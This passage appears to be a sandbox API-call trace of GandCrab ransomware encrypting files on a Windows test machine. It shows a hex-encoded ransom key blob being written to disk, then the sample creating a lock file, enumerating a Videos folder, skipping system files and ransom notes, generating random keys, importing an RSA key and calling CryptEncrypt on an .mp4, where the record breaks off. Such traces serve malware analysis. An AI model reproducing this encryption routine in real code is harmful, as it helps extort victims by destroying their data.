x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0095.254] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0095.255] CloseHandle (hObject=0x2ac) returned 1 [0095.255] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.255] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.255] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x28, wMilliseconds=0x23c)) [0095.255] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.256] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0095.256] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0095.256] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\d2ca4a09d2ca4deb61a.lock") returned 71 [0095.256] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0095.261] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.262] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.262] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\") returned 47 [0095.262] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\*" [0095.262] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0x503738 [0095.262] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.262] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0095.263] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.263] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.263] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0095.263] lstrcmpW (lpString1="1sEw_wY8.mp4", lpString2=".") returned 1 [0095.263] lstrcmpW (lpString1="1sEw_wY8.mp4", lpString2="..") returned 1 [0095.263] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\", lpString2="1sEw_wY8.mp4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\1sEw_wY8.mp4") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\1sEw_wY8.mp4" [0095.263] lstrlenW (lpString=".titwmvjl") returned 9 [0095.263] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\1sEw_wY8.mp4") returned 59 [0095.263] VirtualAlloc (lpAddress=0x0, dwSize=0xb6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.264] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\1sEw_wY8.mp4.titwmvjl") returned 68 [0095.264] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\1sEw_wY8.mp4") returned 59 [0095.264] lstrlenW (lpString=".mp4") returned 4 [0095.264] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.264] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp4 ") returned 5 [0095.264] lstrcmpiW (lpString1=".mp4", lpString2=".titwmvjl") returned -1 [0095.264] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.264] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\1sEw_wY8.mp4") returned 59 [0095.264] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\1sEw_wY8.mp4") returned 59 [0095.264] lstrcmpiW (lpString1="1sEw_wY8.mp4", lpString2="desktop.ini") returned -1 [0095.264] lstrcmpiW (lpString1="1sEw_wY8.mp4", lpString2="autorun.inf") returned -1 [0095.264] lstrcmpiW (lpString1="1sEw_wY8.mp4", lpString2="ntuser.dat") returned -1 [0095.264] lstrcmpiW (lpString1="1sEw_wY8.mp4", lpString2="iconcache.db") returned -1 [0095.264] lstrcmpiW (lpString1="1sEw_wY8.mp4", lpString2="bootsect.bak") returned -1 [0095.264] lstrcmpiW (lpString1="1sEw_wY8.mp4", lpString2="boot.ini") returned -1 [0095.264] lstrcmpiW (lpString1="1sEw_wY8.mp4", lpString2="ntuser.dat.log") returned -1 [0095.264] lstrcmpiW (lpString1="1sEw_wY8.mp4", lpString2="thumbs.db") returned -1 [0095.264] lstrcmpiW (lpString1="1sEw_wY8.mp4", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.264] lstrcmpiW (lpString1="1sEw_wY8.mp4", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.264] lstrcmpiW (lpString1="1sEw_wY8.mp4", lpString2="KRAB-DECRYPT.html") returned -1 [0095.264] lstrcmpiW (lpString1="1sEw_wY8.mp4", lpString2="CRAB-DECRYPT.html") returned -1 [0095.264] lstrcmpiW (lpString1="1sEw_wY8.mp4", lpString2="KRAB-DECRYPT.txt") returned -1 [0095.264] lstrcmpiW (lpString1="1sEw_wY8.mp4", lpString2="CRAB-DECRYPT.txt") returned -1 [0095.264] lstrcmpiW (lpString1="1sEw_wY8.mp4", lpString2="ntldr") returned -1 [0095.264] lstrcmpiW (lpString1="1sEw_wY8.mp4", lpString2="NTDETECT.COM") returned -1 [0095.264] lstrcmpiW (lpString1="1sEw_wY8.mp4", lpString2="Bootfont.bin") returned -1 [0095.264] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\1sEw_wY8.mp4") returned 59 [0095.264] lstrlenW (lpString=".mp4") returned 4 [0095.264] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.265] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp4 ") returned 5 [0095.265] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.265] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.265] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\1sEw_wY8.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\1sew_wy8.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0095.265] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.265] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0095.266] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.266] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0095.267] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.267] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.267] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.267] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0095.267] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.267] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.267] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.268] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0095.268] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.268] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.268] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.268] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0095.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.269] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.269] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.269] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0095.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.269] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5038f8) returned 1 [0095.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.269] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0095.270] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.270] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: 